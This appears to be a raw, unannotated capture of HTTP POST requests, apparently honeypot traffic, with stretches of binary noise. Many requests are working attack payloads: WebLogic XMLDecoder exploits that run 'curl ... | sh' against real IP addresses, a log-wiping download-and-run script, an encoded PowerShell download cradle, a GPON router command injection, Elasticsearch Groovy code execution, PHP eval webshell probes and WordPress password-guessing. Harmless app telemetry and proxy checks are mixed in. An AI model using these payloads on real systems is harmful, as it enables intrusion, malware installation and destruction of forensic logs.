dRVYT+WVA]`{Q4P[X<}_Z5,LfESXl{E]H{kXj[X@8yFZS	nJ1PNh{CPZd*NTiDM'WVQFu?
eW\SJoyYNus
Q?IH8*D8;KSrDCBjxGTSY{k[jW[SAoy@\W\gg^VMZ>jONT]exKVcSWh.FU2-1WInxD
AFu9
rFVQ8+D
S6{JcG_
RAd,\\g{
aBZ2jO^OH!khRBC3jON:gJP=JLZgy@^OH$kaTWSIhxAZS\o}hJLZgjZTY4qI6T_M?,YZdMWcSZP9-W@Aus
hQZ8qZRcqKf^ZVNl*LZR\f/M-LZgyYNHm{fP_WHmdW
HmkK]=
s)
# KArDCBmdWAPfxiW[QLkxCTW]c{rGDTCKlqDTWSaxeG^;,GT4
2T[ZqjNYHb}LPh_QAizA3TgBWRMm.X[u4IrKDTYT>WVRZoygJLrWy*DW1J8:[	";AF)JLZg|DYP\cz#\_PMoqG]VZchQZY@qjNYH5|aFS\SM;~
d/NWhQWQi+B^VXue
BrD^Re|D	Q6zLT5AS^Xm*_SZnxKPhVL% 
0



POST //_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_131
Host: x.x.x.x:9200
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 125

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.File\").listRoots()","lang": "groovy"}}}

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 428
Cache-Control: no-cache

RPQLlNycZnWVvJWyrnFibUMh8Rubv2LuGMse4UcRCSRIivImijaKO9J2fFZZjHijlRAEUV+cJIiv6Wvit00lBanwu2HWgHa5cAjqMGqVls8sdhhFIQsYOd74NEI0QjM2IHqVGDqMsW3JKotA4/o494WcGpf5C8cSyFld2foogwVM87eg95hWshZpOAZy6XtZaEbVmOVqEn0wGxIsuzBiJH2jiyeQmkdCCdXCbeS89f7SqlKQeaU9NZluXjJmJgiBlJpYLa17VTXSO5ngEsSXilmKdbsvfjESAF8s5K8c4G3UjUF2WUDaPpb7y21lKSeFCCY/03ZECMzzADc/J4TiOxq2yvE1tsrM64t4rqc/b4orEm3eYpU2mIxmBaU39r+uWqzBD1zaAO+AjnxDVPgGOqX35h9P49kbyjIZkw8KF34=

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36
Host: x.x.x.x:8080
Content-Length: 0
Connection: Keep-Alive



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 404
Cache-Control: no-cache

RPZcyImdbEC8Js+Oq84pwYIZ7aH9MJZS10vXFUQ/mxDafv6qf3GmLV8iRVurcgclljjhNyGIYvBsdqZQcMYs1VA0r+CuqKH1rrOt4yhWqTUDXkiQacLZQOVsft6RDoFkHNQUe8tUUXuyvsvm+Ih8tQfPPNqJX4veOqei+YjYMgq/iK6oqRsoYo/dfg8jCi7jraPvgGW7CnTCFvcfSqBhxStN/8Yg4yIlrRTCt++l3FYzHEGFxO3N5OGFlpGknH4xtSg0GyeB3JG9GgKIVSLfxkjcH26HoaNsUubyf1aSAaUUM1EVxq0q3uD/vzMHhh1HTSSYLgTXZtLEwa29FN6GuAidn8oGJyQOGMuK1487SY8IZ9nT19ZZHbOjBXqWmz3gHADZk8JcYAE+teeGp9w=

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die((string)(111111111*9));

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 25
Cache-Control: no-cache

log=admin&pwd=admin444444

POST http://u.ucfly.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: u.ucfly.com:80
Connection: Keep-Alive

<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>

POST http://check.proxyradar.com/azenv.php?auth=152967427803&a=PSCMN&i=3489034269&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://check.proxyradar.com/azenv.php?auth=149407325963&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwADEALgAyADAAMAAuADQANQAuADcAOAAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∂ØmÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îäY›∆√«∆fl

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache

Rqdax4zPbVquV02ZdJfYdqRNHKBxCx6N9WQK0ZlzrhhzppPuFRQ5otfA8L4ECinTx3PW5L7+8pvRALSC0n3ep/sUEawG7OnlTnBn2SMp+QGLKeiUOK8x8xr7jNyuxJzptF/BzybdWhuiNMm3ErLFdXNsEkNS4be1N7JR9qgoK35oHYuE8vocBIti2VWNY4Ua64gewz296ctSKHjHMo/8uXSHTpqRozByh4RkN5XH98LnUzfrXt5IPZibgJC2ITovluwuZN8hc9cR+QCbz7rqtPF4tN0xD368L3e+pTRNj5yz5KDZMmGz43P9Gc+OqRYiSuQ52VI4gf2My5ak0ASs2D1pf1gBJYCafaQl6kslf/7UZeWdxmfhdpaqdQc6XcghhuQ/PA==

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache

A1KwzyZEVgtLIycxm6OWduJhJnvsJeFowrcQ8IDdb4sh+JVhnCTVmtOXSP4LN+KWnMcQnzL+nXhRJNz9xo/MI5B4nZgnzd40sx4cS02bPWl0eiNxscjn4O02vgxHKKuOMkEyb+ataIYGm2qeVtZbMn1HkRNCNTK8SQ20e25OVYB/xVca7pT/l2JQrDNiFNaVOA2coImo0rSamjlsCVdu4nEoShgaPQTtHCKhS6Bq+tKef1tec+FyGcG35R80NW+T6J+LJYrBpx7iBRjcUi51plZ60Tu6nrqs4/hpBaU6oiAfI2rSSHq25jSFWv51KWOnrhec4O7Pd22y2SCZ/+WwDAYRUN3b7ZDAEQasAw8vLG568P2rDyYB0iWZPDbiv9i1WU4=

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 23
Cache-Control: no-cache

log=admin&pwd=333333333

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /command.php HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 208

cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74

POST /command.php HTTP/1.1
Accept: */*
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 208

cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74

POST http://www.zhangyuntao.com.cn/IVUPro/todayScore.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: www.zhangyuntao.com.cn
Connection: Keep-Alive
Content-Length: 206

act=-1&data=%7B%22appInfo%22%3A+%22Block+Puzzle+Jewel_com.differencetenderwhite.skirt_18%22%2C+%22rankId%22%3A+%22gem30%22%2C+%22score%22%3A+180%2C+%22uid%22%3A+%22ba7758bb-1039-46c5-888f-950f5ff4b1b8%22%7D

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195



POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache

Q6cIyYicZRWNQPL3EJY0KIDf0UGiORTzglqWlnZqwPQ7RnxoxLR9PKSwFCQ+xIWOmN3/wDjsS8pGHKhdMbbDA+VzG0UXdHFbDMPgPwtq8ZjMx9oFSZexHOeNMDVlzHzNNsQOBOLdL7cbPqpZsr0eiBM+o1+nNVg9+yuHjGnGPbvs5ePFz02Fd82Z/qemePd6HtWwq1Wyd4s2/7GzpLfTZ3qzCnp5L2Z+Cm6tOO0nYLCwPHRdkgE4Q6vGMaVxQDgQm7/UXXOBv6D31zbQRit4vGAKE16lnPOs/zTdi2p0kAU/kOwWUMrPfY3V+kAfc8tAKCOTIMSgnC7/Z9aUe3wXFx57+KJwtyQQ3Pu5dYK70nKpYrNOSy+WcNO5dK7LoqKHshOoGxT2ypG8/vFTm0ALukPZgkFBherRAn5yniDcgwVDfmn84A==

POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1079
Content-Type: multipart/form-data; boundary=3M7FW3NPeNlOJS5nbM6FgBPR0TPbKN0VSPLdoxVk
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--3M7FW3NPeNlOJS5nbM6FgBPR0TPbKN0VSPLdoxVk
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--3M7FW3NPeNlOJS5nbM6FgBPR0TPbKN0VSPLdoxVk
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

168422
--3M7FW3NPeNlOJS5nbM6FgBPR0TPbKN0VSPLdoxVk
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

da32c6169abd6c7efaab37f7aa590487
--3M7FW3NPeNlOJS5nbM6FgBPR0TPbKN0VSPLdoxVk
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--3M7FW3NPeNlOJS5nbM6FgBPR0TPbKN0VSPLdoxVk
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--3M7FW3NPeNlOJS5nbM6FgBPR0TPbKN0VSPLdoxVk--


POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST http://gj.applog.uc.cn/collect?zip=gzip&pf=android&pn=com.uc.browser.en&ve=10.9.0&vc=104&sdk_ve=3.0.10&sdk_vc=212&sf=EVCoreProductMediation&app=0652abada25c&uuid=15bf5ee0f45-af8795dc3d31775f&vno=1495542390494&chk=21a23467 HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: gj.applog.uc.cn
Transfer-Encoding: chunked
Content-Type: application/octet-stream

2fb
ãΩó;o#GÑsˇ
ÊF=˝òÈYÄ°vÊ\úGœ›·$y¸Ô›´‘ⱬÃv…%?vUuÕÛ„ÍÔ∑«Àï0@ÖD¬çe”z˘‚Õflü∆„⁄ʪø=æ›˝ÌÈ€‹Øµq}¯˝q˚±_˙⁄Ó_ØmY©:ON•Ë∫̘üfi¸˛„˘q˝ÎıÈÀÀ˝È>øflû_øƒ3ÆKTyj
Uù ≠!4N®È÷ZÌMo˜ø?>sMıˆÚ:˝˘˙«o˘˝œ_?nº˚U~â◊Oœˇ¢ê•Ml”|2i≠Ujᶉ f
*Q*©è‘yŸa
Ω$‹»∂Ñ'S†.D
∆Y¬Py6Xô€$ì>A≥–º	ü=ÚîJup2È≠Ä’∂¿∫$ÓÖ˙8Lë/©¸/äBW_çÍÓã"^†	WË]◊0Û∆á) Æ(’çŒvwbC(¨$ÔäBiêùãÎ2<LQ/â7∂M“…Ç´tLwE…`hòÃ>≥÷9ß—Òå
äàŸ≤±ûLÔ‘–ˇ,ã@®F“*2töÊfiµÂü°àA‡ñŒVT∆‹tÃX5∆ S
Ùè‡u±è1ıEEFq¸l
)÷5ÛÑLî˜åJ·g–∫$ª±f?<¬KJ͢ª;≠Z∞dèoµp∑Ö∂¨ıˇc∑xL¿å¸äΩ~lH'SpùmÙfÄΩCÚü…¿<zÆ©÷√[è“GFÖ®ŒfinMsúˆ›≠‚`´.‡*Y]dñï>A±˚Ç6:{V\Rû\|ůE	:ÙdJ’Üè“S–ûQë¥ß˚b2Àò@
ÌI[(f±gn“<ôçj?úQAA%*@Œfiç1*T∏;ÔsÙ(Ω@T¡T=˜ZÍq
˛h 1é≥€`VÀä>∆ÓÒ€√‚1õ}`«¢iÊ|‹›AA±∏7<õ¢;åû
%dvÜÄ `YNÏkÃr‹›ºw⁄∞ü~æ∞â)1G“f‹;múí4“*◊9f-‚RˇÎ)ÈBÆe≤
0



POST http://check.proxyradar.com/azenv.php?auth=149169258913&a=PSCMN&i=1082764042&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://api.vungle.com/api/v4/sessionStart HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 106

{"start":1495017089026,"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=jamesatchue&pwd=buster

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
q÷ ÍÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îüÑ$Y›∆√«∆fl

POST http://appinfocdn.ksmobile.net/cpui HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: appinfocdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 58

:´gÜ—ó;eò@YMp<%iÅ˝Yª?ffA0#]UAIebØæo«»u2fiyÄ˝…0ŸπLNU]9

POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

axa=die('Hello, Peppa!'.(string)(111111111*9));

POST http://best-proxies.ru/azenv.php?rand=e4a0f62a0175e0458a09886b06e018fb HTTP/1.1
Cookie: testCookie=true
Host: best-proxies.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: http://best-proxies.ru/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://www.zhangyuntao.com.cn/IVUPro/todayScore.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: www.zhangyuntao.com.cn
Connection: Keep-Alive
Content-Length: 206

act=-1&data=%7B%22appInfo%22%3A+%22Block+Puzzle+Jewel_com.differencetenderwhite.skirt_18%22%2C+%22rankId%22%3A+%22gem30%22%2C+%22score%22%3A+556%2C+%22uid%22%3A+%22ba7758bb-1039-46c5-888f-950f5ff4b1b8%22%7D

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∏ÏÕËÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î;;Y›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 24
Cache-Control: no-cache

log=admin&pwd=admin99999

POST http://t12.proxy-checks.com/favicon.ico HTTP/1.1
Host: t12.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
